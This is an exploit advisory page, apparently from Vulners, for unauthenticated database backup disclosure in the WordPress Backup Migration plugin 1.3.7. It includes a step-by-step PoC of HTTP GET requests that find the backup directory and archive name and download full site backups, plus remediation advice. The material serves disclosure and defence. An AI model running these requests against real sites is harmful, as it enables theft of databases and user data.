Vulners
Lucene search
📄 WordPress Backup Migration 1.3.7 Database Disclosure
=============================================================================================================================================
| # Title : WordPress Plugin Backup Migration 1.3.7 Unauthenticated Database Backup |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/backup-backup/ |
=============================================================================================================================================
POC :
Description:
The Backup Migration WordPress plugin (version 1.3.7) allows unauthenticated users to access sensitive backup files,
potentially exposing the full database and website content. An attacker can retrieve backup archives without authentication.
Impact:
An attacker can:
- Download full database backups.
- Access sensitive configuration and user data.
- Potentially compromise the entire WordPress installation.
Technical Details / Proof of Concept (PoC):
1) Get the version of the plugin:
GET /wp-content/plugins/backup-backup/readme.txt
Response:
--------------------------------------------------------------------------
Stable tag: 1.3.7
--------------------------------------------------------------------------
2) Get the name of the backup directory:
GET /wp-content/backup-migration/config.json
Response:
--------------------------------------------------------------------------
{
[...],
"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
[...],
"OTHER:EMAIL":"[email protected]"
}
--------------------------------------------------------------------------
3) Get the name of the archive containing the backups:
GET /wp-content/backup-migration/complete_logs.log
Response:
--------------------------------------------------------------------------
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
--------------------------------------------------------------------------
4) Build the path for the download:
GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
Recommendation:
- Restrict access to backup directories via .htaccess or web server configuration.
- Do not store backups in publicly accessible paths.
- Apply authentication checks before serving backup files.
- Update the plugin if a secure version is released by the vendor.
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Mar 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9